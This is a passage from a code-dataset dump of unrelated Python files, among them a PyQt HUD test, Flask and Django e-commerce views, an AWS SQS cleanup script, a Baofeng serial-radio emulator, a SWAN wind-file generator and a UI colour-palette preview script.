alignment = Qt.AlignRight | Qt.AlignVCenter, \r\n rect_color = QColor(255, 255, 255, 150), \r\n border_radius = 14, \r\n outline_color = QColor(0, 0, 0, 255), \r\n outline_width = 2, \r\n force_disable_background = True,\r\n spacing = 3,\r\n #frameless = False,\r\n )\r\n \r\n theme_window(\r\n window = windows[2], \r\n alignment = Qt.AlignHCenter | Qt.AlignBottom, \r\n rect_color = QColor(240, 240, 240), \r\n font_size = 18, \r\n margins = 2, \r\n force_disable_background = True, \r\n scrollbar = True, \r\n font_family = \"Courier\"\r\n )\r\n \r\n theme_window(\r\n window = windows[3],\r\n window_width = 550,\r\n alignment = Qt.AlignRight | Qt.AlignBottom, \r\n rect_color = QColor(50, 40, 48), \r\n background_color = QColor(21, 8, 0, 100), \r\n text_color = QColor(210, 84, 0), \r\n border_radius = 10, \r\n spacing = 10,\r\n #frameless = False,\r\n )\r\n \r\ndef theme_window(\r\n window, \r\n alignment,\r\n window_width = 300,\r\n window_height = 300,\r\n rect_color = QColor(255, 255, 255, 0),\r\n background_color = QColor(255, 255, 255, 0),\r\n text_color = QColor(0, 0, 0),\r\n font_size = 14,\r\n border_radius = 5,\r\n margins = 10,\r\n spacing = 5,\r\n outline_color = QColor(0, 0, 0, 0),\r\n outline_width = 0,\r\n scrollbar = False,\r\n force_disable_background = False,\r\n font_family = \"\",\r\n frameless = True,\r\n ):\r\n \r\n size = QSize(window_width, window_height)\r\n screen_geometry = qApp.primaryScreen().geometry()\r\n if frameless:\r\n screen_geometry.adjust(400, 160, -30, -30)\r\n else:\r\n screen_geometry.adjust(400, 130, -30, -60)\r\n \r\n window.setGeometry(\r\n QStyle.alignedRect(\r\n Qt.LeftToRight,\r\n alignment,\r\n size,\r\n screen_geometry\r\n )\r\n )\r\n \r\n palette = window.palette()\r\n palette.setColor(QPalette.Base, rect_color)\r\n palette.setColor(QPalette.Window, background_color)\r\n palette.setColor(QPalette.Text, text_color)\r\n window.setPalette(palette)\r\n \r\n window.output.setTextEditBorderRadius(border_radius)\r\n window.output.setTextEditMargins(margins)\r\n window.output.setSpacing(spacing)\r\n \r\n window.output.setRectOutlineColor(outline_color)\r\n window.output.setRectOutlineWidth(outline_width)\r\n \r\n if scrollbar:\r\n window.output.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n else:\r\n window.output.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n window.output.setForceDisableBackground(force_disable_background)\r\n \r\n font = window.font()\r\n font.setPointSize(font_size)\r\n font.setFamily(font_family)\r\n window.setFont(font)\r\n window.repaint()\r\n window.output.updateTextEdits()\r\n window.setWindowFlag(Qt.FramelessWindowHint, frameless)\r\n \r\nif __name__ == '__main__':\r\n hud_test()\r\n","repo_name":"termx88/Caster_command_hud","sub_path":"test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14118438551","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom .views import account\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('settings.DevelopmentConfig')\n\n # 将db注册到app中\n db.init_app(app)\n\n # 注册蓝图\n app.register_blueprint(account.account)\n\n return app\n","repo_name":"HkwJsxl/PythonFullStackFlask","sub_path":"oldboy/Flask-SQLAlchemy_/start/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41370349636","text":"import boto3\r\n\r\n# Create an SQS client\r\nboto3.setup_default_session(profile_name='sbadmin')\r\nsqs = boto3.client('sqs')\r\n\r\nqueue_url = 'https://sqs.us-east-2.amazonaws.com/218058812834/sb-events-sqs-lambda-message-queue'\r\n\r\n# Receive messages from the queue\r\nresponse = sqs.receive_message(\r\n QueueUrl=queue_url,\r\n MaxNumberOfMessages=10,\r\n WaitTimeSeconds=20\r\n)\r\nprint(response)\r\n# Get the list of messages\r\nmessages = response.get('Messages', [])\r\nprint(messages)\r\n\r\n# Iterate through the messages and delete them\r\nfor message in messages:\r\n receipt_handle = message['ReceiptHandle']\r\n sqs.delete_message(\r\n QueueUrl=queue_url,\r\n ReceiptHandle=receipt_handle\r\n )\r\n","repo_name":"tinitiate/aws-lambda-python","sub_path":"delete_sqs_queue.py","file_name":"delete_sqs_queue.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37116676767","text":"import pandas as pd\r\nimport ast\r\n\r\nfrom sklearn.model_selection import train_test_split, ShuffleSplit\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nfrom data import load_json\r\n\r\n\r\ndef split(df: pd.DataFrame, seed: int=1156, test_size: float=0.1, split: bool=True):\r\n settings = load_json()\r\n column = settings[\"column\"][0]\r\n \r\n data = df[[column[\"target\"]] + column[\"text\"] + column[\"numerical\"]]\r\n \r\n return train_test_split(data, test_size=test_size, random_state=seed)\r\n \r\n \r\ndef preprocess(train: pd.DataFrame, test: pd.DataFrame, verbose: bool = True) -> pd.DataFrame:\r\n settings = load_json()\r\n\r\n train = _quantile(train, settings)\r\n train, test = _minmax(train, test, settings)\r\n train, test = _process_tokens(train, test, settings)\r\n \r\n return train, test\r\n\r\n\r\ndef _quantile(df: pd.DataFrame, settings, verbose: bool = True) -> pd.DataFrame:\r\n quantile = settings[\"preprocess\"][0][\"quantile\"][0][\"quantile\"]\r\n columns = settings[\"preprocess\"][0][\"quantile\"][0][\"columns\"]\r\n original_shape = df.shape[0]\r\n\r\n for column in columns:\r\n pre_rows = df.shape[0]\r\n df = df[df[column] < df[column].quantile(quantile)]\r\n\r\n if verbose:\r\n print(\"Removed\", pre_rows - df.shape[0], \"rows while filtering\", quantile, \"quantile of\", column)\r\n\r\n if verbose:\r\n print(\"Original rows: {}, rows after preprocessing: {}\".format(original_shape, df.shape[0]))\r\n print(\"Dataframe reduced by: {:2.2%}\".format(-(1. - (original_shape/df.shape[0]))))\r\n\r\n return df\r\n \r\n \r\ndef _minmax(train, test, settings):\r\n scaler = MinMaxScaler()\r\n columns = settings[\"preprocess\"][0][\"minmax\"]\r\n \r\n train[columns] = scaler.fit_transform(train[columns])\r\n test[columns] = scaler.transform(test[columns])\r\n \r\n return train, test\r\n \r\n \r\ndef _process_tokens(train, test, settings):\r\n train = _clear_tokens(train, settings)\r\n test = _clear_tokens(test, settings)\r\n \r\n return train, test\r\n \r\n \r\ndef _clear_tokens(df, settings):\r\n columns = settings[\"preprocess\"][0][\"token\"]\r\n \r\n for column in columns:\r\n values = [ast.literal_eval(row) for row in df[column]]\r\n values = _remove_empty(values)\r\n values = _remove_nan(values)\r\n # values = _remove_single_character(values)\r\n values = _to_string(values)\r\n \r\n df[column] = values\r\n \r\n return df\r\n \r\n \r\ndef _remove_empty(data):\r\n return [row if len(row) > 0 else [''] for row in data]\r\n \r\n \r\ndef _remove_nan(data):\r\n return [row if row[0] != 'nan' else [''] for row in data]\r\n \r\n\r\ndef _remove_single_character(data):\r\n return [[word for word in row if len(word) > 1 ] for row in data]\r\n \r\n \r\ndef _to_string(data):\r\n return [' '.join(row) for row in data]\r\n","repo_name":"Warwick1156/PED-WSB","sub_path":"bin/src/dataprep.py","file_name":"dataprep.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31190536911","text":"num1 = input()\r\nnum2 = input()\r\nout1 = ''\r\nout2 = ''\r\nwhile len(num1)i2:\r\n out1 += i1\r\n elif i2>i1:\r\n out2 += i2\r\n else:\r\n out1 += i1\r\n out2 += i2\r\nif len(out1) == 0:\r\n print('YODA')\r\nelse:\r\n print(int(out1))\r\nif len(out2) == 0:\r\n print('YODA')\r\nelse:\r\n print(int(out2))","repo_name":"Nick-AI/ProgrammingPractice","sub_path":"Kattis/yoda.py","file_name":"yoda.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73090261802","text":"import serial\n\nSERIAL_PORT = \"COM1\"\n\n### DATA SENT BY COMPUTER ###\n\n# initial request sent by computer\nC_READ_INIT = bytes.fromhex(\"FE 03 30 08\")\n# download request?\nC_DL_REQ = bytes.fromhex(\"45 02 50 52 4F 47 52 41 4C\")\nACK = bytes.fromhex(\"02\")\n\n### DATA SENT BY RADIO ###\n# expected response to initial program request\nR_INIT_RESP = bytes.fromhex(\"57 03 30 08 1F 03 FF FF FF FF FF FF\")\nR_READ_RESP = bytes.fromhex(\n \"574502501f03ffffffffffffff00010100850100496201007c0100804562500100800008010ec7d2001a28080e002c002cff01ffff403e353254523e3c272653510d0f0b0eff19dd0b23ff87e527182338230003\"\n) # a blank default config\nR_READ_RESP_WBEEP = bytes.fromhex(\n \"574502501f03ffffffffffffff80010100850100496201007c0100804562500100800008750ec7d2021a28080e002c002cff01ffff403e353254523e3c272653510d0f0b0eff19dd0b23ff87e527182338230003\"\n)\n\n\ndef send_init_resp():\n \"\"\"Send the response to the initial program request to the computer\"\"\"\n ser.write(R_INIT_RESP)\n print(\"Sent R_INIT_RESP data (radio to computer):\", R_INIT_RESP.hex())\n\n\ndef send_read_resp(read_resp):\n \"\"\"Send the response to the read request to the computer\"\"\"\n ser.write(read_resp)\n print(\"Sent R_READ_RESP data (radio to computer):\", read_resp.hex())\n\n\nif __name__ == \"__main__\":\n # Setup serial port\n ser = serial.Serial(SERIAL_PORT, baudrate=9600)\n\n try:\n received_data = b\"\" # Initialize an empty byte string for concatenation\n while True:\n # Read data from the serial port in chunks of 4 bytes\n chunk = ser.read(1)\n received_data += chunk\n\n if received_data == C_READ_INIT:\n print(\"Received C_READ_INIT data (computer to radio):\", received_data.hex())\n # clear the buffer\n received_data = b\"\"\n # Send the response to the initial program request\n send_init_resp()\n\n if received_data == C_DL_REQ:\n print(\"Received C_DL_REQ data (computer to radio):\", received_data.hex())\n # clear the buffer\n received_data = b\"\"\n send_read_resp(R_READ_RESP)\n \n if received_data == bytes.fromhex(\"45\"):\n print(\"Received 45\")\n ser.write(bytes.fromhex(\"46\"))\n \n else:\n print(\"Received unexpected data (computer to radio):\", received_data)\n\n except KeyboardInterrupt:\n print(\"Exiting fakeradio program.\")\n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n finally:\n ser.close()\n","repo_name":"emuehlstein/baofeng_bfc50","sub_path":"archive/fakeradio.py","file_name":"fakeradio.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74613540843","text":"def swanvectorvarspconst(Vx, Vy, savedata='no', outfilename='swanwind.wnd', outfilelocation=None):\r\n \"\"\"\r\n .. ++++++++++++++++++++++++++++++++YA LATIF++++++++++++++++++++++++++++++++++\r\n .. + +\r\n .. + ScientiMate +\r\n .. + Earth-Science Data Analysis Library +\r\n .. + +\r\n .. + Developed by: Arash Karimpour +\r\n .. + Contact : www.arashkarimpour.com +\r\n .. + Developed/Updated (yyyy-mm-dd): 2017-12-01 +\r\n .. + +\r\n .. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n scientimate.swanvectorvarspconst\r\n ================================\r\n\r\n .. code:: python\r\n\r\n swanvectorvariable = scientimate.swanvectorvarspconst(Vx, Vy, savedata='no', outfilename='swanwind.wnd', outfilelocation=None)\r\n\r\n Description\r\n -----------\r\n\r\n Generate SWAN file for spatially constant vector variable\r\n\r\n Inputs\r\n ------\r\n\r\n Vx\r\n | Variable in x direction (x component of input variable)\r\n | If size of Vx>1, then it is considered as a time series\r\n | 1st element is 1st time step, 2nd element is 2nd time step, ...\r\n Vy\r\n | Variable in y direction (y component of input variable)\r\n | Should have a same size as Vx\r\n savedata='no'\r\n | Define if save data in a file or not\r\n | 'no': does not save \r\n | 'yes': save data as ascii file\r\n outfilename='swanwind.wnd'\r\n | Name of output file between ' ' mark, example: 'swanwind.wnd'\r\n | outfilename should have proper name and extension\r\n outfilelocation=pwd\r\n Location of output file between ' ' mark, example: 'C:\\' in MATLAB, or 'C:/' in Python\r\n\r\n Outputs\r\n -------\r\n\r\n swanvectorvariable\r\n | Spatially constant vector variable formated for SWAN\r\n | Note: Vector variable at each time step is assigned into 4 points,\r\n | assuming the vector variable domain is defined by 4 points, one at each corner\r\n\r\n Examples\r\n --------\r\n\r\n .. code:: python\r\n\r\n import scientimate as sm\r\n\r\n windvelx=[10.5,10.6,10.55] #Data for 3 time steps\r\n windvely=[2.5,2.6,2.55] #Data for 3 time steps\r\n savedata='no'\r\n outfilename='swanwind.wnd'\r\n outfilelocation=None\r\n swanvectorvariable=sm.swanvectorvarspconst(windvelx,windvely,savedata,outfilename,outfilelocation)\r\n\r\n References\r\n ----------\r\n\r\n Booij, N. R. R. C., Ris, R. C., & Holthuijsen, L. H. (1999). \r\n A third‐generation wave model for coastal regions: 1. Model description and validation. \r\n Journal of geophysical research: Oceans, 104(C4), 7649-7666.\r\n\r\n SWAN Team. (2007). S\r\n WAN user manual. \r\n Delft University of Technology. The Netherlands.\r\n\r\n .. License & Disclaimer\r\n .. --------------------\r\n ..\r\n .. Copyright (c) 2020 Arash Karimpour\r\n ..\r\n .. http://www.arashkarimpour.com\r\n ..\r\n .. THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n .. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n .. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n .. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n .. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n .. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n .. SOFTWARE.\r\n \"\"\"\r\n\r\n #--------------------------------------------------------------------------\r\n #CODE\r\n #--------------------------------------------------------------------------\r\n #Import required packages\r\n\r\n import numpy as np\r\n import scipy as sp\r\n import os\r\n\r\n #--------------------------------------------------------------------------\r\n #Convert inputs to numpy array\r\n\r\n #Changing type to numpy array\r\n def type2numpy(variable):\r\n if type(variable) is not str:\r\n if np.size(variable)==1:\r\n if ((type(variable) is list) or (type(variable) is np.ndarray)):\r\n variable=np.array(variable)\r\n else:\r\n variable=np.array([variable])\r\n elif np.size(variable)>1:\r\n if (type(variable).__module__)!='numpy':\r\n variable=np.array(variable) \r\n return variable\r\n \r\n Vx=type2numpy(Vx)\r\n Vy=type2numpy(Vy)\r\n\r\n #--------------------------------------------------------------------------\r\n #Assign default values\r\n\r\n if outfilelocation is None: outfilelocation=os.getcwd()\r\n\r\n #--------------------------------------------------------------------------\r\n #Defining required functions\r\n\r\n def cart2pol(x,y):\r\n rho=np.sqrt(x**2+y**2)\r\n theta=np.arctan2(y,x)\r\n return theta,rho\r\n \r\n def pol2cart(theta,rho):\r\n x=rho*np.cos(theta)\r\n y=rho*np.sin(theta)\r\n return x,y\r\n\r\n #--------------------------------------------------------------------------\r\n #Generating SWAN file\r\n\r\n #If Vx=[U1;U2;U3]; and Vx=[V1;V2;V3];\r\n #Then SWAN wind file (.wnd) for this windvel with three time steps has a format of:\r\n # U1 U1\r\n # U1 U1\r\n # V1 V1\r\n # V1 V1\r\n # U2 U2\r\n # U2 U2\r\n # V2 V2\r\n # V2 V2\r\n # U3 U3\r\n # U3 U3\r\n # V3 V3\r\n # V3 V3\r\n \r\n #Creating the wind\r\n M=len(Vx)\r\n swanvectorvariable=np.zeros((4*M,2))\r\n for i in range(0,len(Vx),1):\r\n \r\n #Wind velocity at time step i, first method\r\n swanvectorvariable[4*i:4*i+2,0:2]=Vx[i] #x wind velocity at time step i\r\n swanvectorvariable[4*i+2:4*i+4,0:2]=Vy[i] #y wind velocity at time step i\r\n \r\n #Wind velocity at time step i, second method\r\n #x wind velocity at time step i\r\n #swanvectorvariable[4*i,0]=Vx[i];\r\n #swanvectorvariable[4*i,1]=Vx[i];\r\n #swanvectorvariable[4*i+1,0]=Vx[i];\r\n #swanvectorvariable[4*i+1,1]=Vx[i];\r\n \r\n #y wind velocity at time step i\r\n #swanvectorvariable[4*i+2,0]=Vy[i];\r\n #swanvectorvariable[4*i+2,1]=Vy[i];\r\n #swanvectorvariable[4*i+3,0]=Vy[i];\r\n #swanvectorvariable[4*i+3,1]=Vy[i];\r\n \r\n #--------------------------------------------------------------------------\r\n #Saving data\r\n\r\n if savedata=='yes':\r\n \r\n #Changing directory to saving directory\r\n currentFolder=os.getcwd()\r\n os.chdir(outfilelocation)\r\n \r\n #Saving data\r\n np.savetxt(outfilename,swanvectorvariable,delimiter=' ')\r\n \r\n #Changing directory to working directory\r\n os.chdir(currentFolder)\r\n\r\n #--------------------------------------------------------------------------\r\n #Outputs\r\n return swanvectorvariable\r\n\r\n #--------------------------------------------------------------------------\r\n","repo_name":"akarimp/ScientiMate","sub_path":"Python Functions/swan_wave_model/swanvectorvarspconst.py","file_name":"swanvectorvarspconst.py","file_ext":"py","file_size_in_byte":7207,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"19"} +{"seq_id":"5118018570","text":"# Subject from the GoF Observer pattern.\n\n__ver__=\"$Id$\"\n\nimport unittest\nimport types\nfrom strongbox import WhiteBox, attr\n\nclass WhiteBoxTest(unittest.TestCase):\n\n # we implement the famous Gang of Four Observer pattern:\n \n def check_Observable(self):\n subject = WhiteBox()\n observer = object()\n subject.addObserver(observer)\n assert observer in subject.private.observers\n subject.removeObserver(observer)\n assert observer not in subject.private.observers\n\n # Injectable is like Observable, but instead of notifying\n # on set, we notify on get. That's so we can lazy load objects:\n\n def check_Injectable(self):\n subject = WhiteBox()\n injector = object()\n subject.addInjector(injector)\n assert injector in subject.private.injectors\n subject.removeInjector(injector)\n assert injector not in subject.private.injectors\n \n\n # First the setter. Setters are easy. This is very useful for\n # transparent persistence (a la ZODB) and also for general\n # Model/View/Controller and Observer pattern stuff.\n # \n # As such, the events are fired AFTER the value is set\n # in the object. (Contrast to getter events, below...)\n\n def check_set_event(self):\n class Observer:\n def __init__(self):\n self.updated = False\n def update(self, subject, name, value):\n self.updated = True\n self.name = name\n self.value = value\n class Subject(WhiteBox):\n name = attr(str)\n\n # first, try with no observers:\n sub = Subject()\n sub.name='wilbur'\n assert sub.name=='wilbur', sub.name\n\n # now add an observer:\n obs = Observer()\n assert not obs.updated\n sub.addObserver(obs.update)\n sub.name = \"fred\"\n assert obs.updated, \"observer should have been updated on setattr\"\n assert obs.name == \"name\"\n assert obs.value == \"fred\"\n \n\n # Getters, on the other hand are useful for lazy loading.\n # As such, the events get fired BEFORE the value is returned.\n # \n # Of course, you couldn't call anything after you returned\n # a value anyway :)\n\n def check_get_event(self):\n class Injector:\n def __init__(self):\n self.called = 0\n def getter_called(self, subject, name):\n self.called += 1\n self.name = name\n subject.name = \"wilma\"\n class Subject(WhiteBox):\n name = attr(str)\n inj = Injector()\n sub = Subject(name=\"wanda\")\n sub.addInjector(inj.getter_called)\n value = sub.name\n assert inj.called==1, \\\n \"should have been called 1 time (vs %i)\" % inj.called\n assert inj.name == \"name\"\n assert value == \"wilma\", value\n\n def test_isDirty(self):\n \"\"\"\n this is for arlo...\n \"\"\"\n class Dirt(WhiteBox):\n x = attr(str)\n d = Dirt()\n # we start out dirty so that we get saved\n # (even if we're blank!)\n assert d.private.isDirty\n d = Dirt(x=\"dog\")\n assert d.private.isDirty\n\n # but if something marks us clean, and then\n # we change, we should be dirty again!\n d.private.isDirty = 0\n d.x = \"cat\"\n assert d.private.isDirty\n","repo_name":"sabren/sixthdev","sub_path":"@gone/strongbox/spec/WhiteBoxTest.py","file_name":"WhiteBoxTest.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"22731011549","text":"import json\n\nfrom django.contrib.sites.models import Site\nfrom django.http import HttpResponseBadRequest, HttpResponse\nfrom django.shortcuts import redirect, get_object_or_404, render\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import TemplateView\nfrom django.views.generic.edit import BaseFormView\nfrom django_jinja.views.generic import CreateView\n\nfrom apps.orders.cart import Cart\nfrom apps.orders.constants import OrderStatus\nfrom apps.orders.forms import CartOperationForm, ConfirmModelForm\nfrom apps.orders.models import Order, OrderItem, OrderSettings\nfrom apps.orders.services.delivery.constants import DeliveryMethod\nfrom apps.orders.services.payment.constants import PaymentMethod\nfrom apps.orders.services.payment.model import IPaymentType\nfrom apps.products.models import Product\nfrom shared.services.email import send_email\n\n\nclass CartTemplateView(TemplateView):\n template_name = \"orders/cart.jinja\"\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n cart: Cart = Cart(self.request)\n cart.updateQuantity()\n products = Product.objects.filter(pk__in=cart.cart_items.keys())\n data['cart'] = {product: cart.cart_items[str(product.pk)] for product in products}\n data['totalPrice'] = sum([product.price * cart.cart_items[str(product.pk)] for product in products])\n return data\n\n\nclass CartOperationView(BaseFormView):\n form_class = CartOperationForm\n\n def get(self, *args, **kwargs):\n return redirect(\"orders:cart\")\n\n def form_invalid(self, form):\n return HttpResponseBadRequest()\n\n def form_valid(self, form):\n product: Product = get_object_or_404(Product, slug=self.request.POST['slug'])\n cart: Cart = Cart(self.request)\n function = getattr(cart, self.request.POST['operation'], None)\n if function:\n # Check if its function and has @cart_option decorator\n if callable(function) and function.__dict__.get('cart', False):\n function(product, int(self.request.POST['value']))\n count = cart.cart_items.get(str(product.pk), 0)\n return HttpResponse(json.dumps({'count': count, 'price': count * product.price}, default=str))\n\n\nclass OrderCreateView(CreateView):\n template_name = \"orders/confirm.jinja\"\n model = Order\n form_class = ConfirmModelForm\n\n def dispatch(self, request, *args, **kwargs):\n self.cart = Cart(request)\n # If cart empty or cart items unavailable do redirect\n if len(self.cart.cart_items) == 0 or not self.cart.check_available():\n return redirect(\"orders:cart\")\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n\n products = Product.objects.filter(pk__in=self.cart.cart_items.keys())\n data['cart'] = {product: self.cart.cart_items[str(product.pk)] for product in products}\n data['totalPrice'] = sum([product.price * self.cart.cart_items[str(product.pk)] for product in products])\n\n data['delivery_js'] = [DeliveryMethod[key].values[0].get_script() for key in DeliveryMethod.__members__.keys()\n if DeliveryMethod[key].values[0].get_script() != \"\"]\n\n return data\n\n def form_valid(self, form):\n order: Order = form.save(commit=False)\n products = Product.objects.filter(pk__in=self.cart.cart_items.keys())\n\n for product in products:\n product.count -= self.cart.cart_items[str(product.pk)]\n product.save()\n\n order.cost = sum([product.price * self.cart.cart_items[str(product.pk)] for product in products])\n # saving delivery_data to track field. After will be processed to document track number\n order.track = form.cleaned_data['delivery_data']\n\n order.save()\n\n OrderItem.objects.bulk_create([\n OrderItem(order=order, product=products.get(id=key), count=value)\n for key, value in self.cart.cart_items.items()])\n\n settings: OrderSettings = OrderSettings.get_solo()\n\n items: str = \"\"\n\n for product in products:\n items += settings.item_format.format(\n url=\"{site}{path}\".format(site=Site.objects.get_current().domain, path=product.get_absolute_url()),\n name=product.name,\n image=\"{site}{path}\".format(site=Site.objects.get_current().domain, path=product.get_image()),\n price=product.price,\n count=self.cart.cart_items[str(product.pk)],\n totalPrice=self.cart.cart_items[str(product.pk)] * product.price\n )\n\n title: str = settings.new_order_mail_title.format(number=order.pk)\n message: str = settings.new_order_mail.format(number=order.pk, total_price=order.cost, items=items)\n\n send_email(order.email, title, message)\n\n self.cart.clear()\n return redirect(\"orders:pay\", uuid=order.uuid)\n\n\nclass PaymentView(View):\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n self.order: Order = get_object_or_404(Order, uuid=self.kwargs['uuid'])\n if self.order.status == OrderStatus.PAYED:\n return render(request, \"orders/paid.jinja\", {\"object\": self.order})\n if self.order.status != OrderStatus.NEW:\n return redirect('products:list')\n\n self.payment: IPaymentType = PaymentMethod[self.order.payment_service].values[0]\n return super().dispatch(request, *args, **kwargs)\n\n def get(self, *args, **kwargs):\n return self.payment.handle_get(self.order, self.request)\n\n def post(self, *args, **kwargs):\n return self.payment.handle_post(self.order, self.request)\n","repo_name":"demirug/ECommerce","sub_path":"apps/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37517376559","text":"from collections import deque\nclass MovingAverage:\n\n def __init__(self, size: int):\n self.windowSize = size\n self.values = deque([])\n\n def next(self, val: int) -> float:\n self.values.append(val)\n if len(self.values) > self.windowSize:\n self.values.popleft()\n return sum(self.values) / len(self.values)\n\n\n\n# Your MovingAverage object will be instantiated and called as such:\n# obj = MovingAverage(size)\n# param_1 = obj.next(val)","repo_name":"ikang9712/LeetCodeTracker","sub_path":"0346-moving-average-from-data-stream/0346-moving-average-from-data-stream.py","file_name":"0346-moving-average-from-data-stream.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70990419564","text":"from PIL import Image, ImageDraw, ImageFont, ImageFont\nimport os\n\ncolorPalletes = dict()\n\n# From https://sashamaps.net/docs/tools/20-colors/\ncolorPalletes['original'] = {\n 'Button': (255, 255, 25),\n 'Label': (60, 180, 75),\n 'Screen': (230, 25, 75),\n 'TextBox': (0, 130, 200),\n 'Image': (145, 30, 180),\n 'CheckBox': (245, 130, 48),\n 'ListPicker': (250, 190, 212),\n 'Switch': (70, 240, 240),\n 'Slider': (240, 50, 230),\n 'Map': (210, 245, 60)\n}\n\n# From https://bookdown.org/hneth/ds4psy/D-2-apx-colors-essentials.html + Sugestao Nathalie\ncolorPalletes['pal1'] = {\n 'Button': \"#999999\",\n 'Label': \"#E69F00\",\n 'Screen': \"#56B4E9\",\n 'TextBox': \"#009E73\",\n 'Image': \"#F0E442\",\n 'CheckBox': \"#0072B2\",\n 'ListPicker': \"#D55E00\",\n 'Switch': \"#CC79A7\",\n 'Slider': \"#8C74D2\",\n 'Map': \"#847848\"\n}\ncolorPalletes['pal2'] = {\n 'Button': \"#000000\",\n 'Label': \"#E69F00\",\n 'Screen': \"#56B4E9\",\n 'TextBox': \"#009E73\",\n 'Image': \"#F0E442\",\n 'CheckBox': \"#0072B2\",\n 'ListPicker': \"#D55E00\",\n 'Switch': \"#CC79A7\",\n 'Slider': \"#8C74D2\",\n 'Map': \"#847848\"\n}\n\n# From https://medialab.github.io/iwanthue/\ncolorPalletes['iwanthue'] = {\n 'Button': \"#54de45\",\n 'Label': \"#7320c0\",\n 'Screen': \"#9fe633\",\n 'TextBox': \"#332ebb\",\n 'Image': \"#e7e027\",\n 'CheckBox': \"#6255ea\",\n 'ListPicker': \"#ec3e22\",\n 'Switch': \"#ab4bea\",\n 'Slider': \"#f2279f\",\n 'Map': \"#d43dd3\"\n}\n\n# From https://mokole.com/palette.html\ncolorPalletes['mokole'] = {\n 'Button': \"#006400\",\n 'Label': \"#00008b\",\n 'Screen': \"#b03060\",\n 'TextBox': \"#ff0000\",\n 'Image': \"#ffd700\",\n 'CheckBox': \"#7fff00\",\n 'ListPicker': \"#00ffff\",\n 'Switch': \"#ff00ff\",\n 'Slider': \"#6495ed\",\n 'Map': \"#ffdab9\"\n}\n\n# https://seaborn.pydata.org/generated/seaborn.color_palette.html\n'''\nOriginal code:\n import seaborn as sns\n snsCollorPallete = sns.color_palette(\"bright\")\n newCollorPallete = list()\n for color in snsCollorPallete:\n newColor = tuple(int(value * 255) for value in color)\n newCollorPallete.append(newColor)\n for color in newCollorPallete:\n print(color)\n colorPalletes['seaborn'] = {\n 'Button': newCollorPallete[0],\n 'Label': newCollorPallete[1],\n 'Screen': newCollorPallete[2],\n 'TextBox': newCollorPallete[3],\n 'Image': newCollorPallete[4],\n 'CheckBox': newCollorPallete[5],\n 'ListPicker': newCollorPallete[6],\n 'Switch': newCollorPallete[7],\n 'Slider': newCollorPallete[8],\n 'Map': newCollorPallete[9]\n }\n'''\ncolorPalletes['seaborn'] = {\n 'Button': (2, 62, 255),\n 'Label': (255, 124, 0),\n 'Screen': (26, 201, 56),\n 'TextBox': (232, 0, 11),\n 'Image': (139, 43, 226),\n 'CheckBox': (159, 72, 0),\n 'ListPicker': (241, 76, 193),\n 'Switch': (163, 163, 163),\n 'Slider': (255, 196, 0),\n 'Map': (0, 215, 255)\n}\n\n# Select color pallete\ncolorDict = colorPalletes['seaborn']\n# Get font\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/freefont/FreeSansBold.ttf\", 35)\n# Options:\ntext_enable = True\ntext_border_enable = False\n\n\ndef getCoords(component):\n return [(component.x1, component.y1), (component.x2, component.y2)]\n\ndef get_label(component):\n return component.label\n\ndef translate_label(label, language='en'):\n return label\n \n\ndef generate_preview(\n image_path,\n components,\n language='en',\n show = False\n):\n image = Image.open(image_path)\n image = image.resize((720, 1280))\n image = image.convert('RGB')\n\n draw = ImageDraw.Draw(image)\n\n for component in components:\n # Get coordinates and label\n [(x0, y0), (x1, y1)] = getCoords(component=component)\n label = get_label(component)\n\n # Draw multiple rectangles for thicker borders\n draw.rectangle([(x0, y0), (x1, 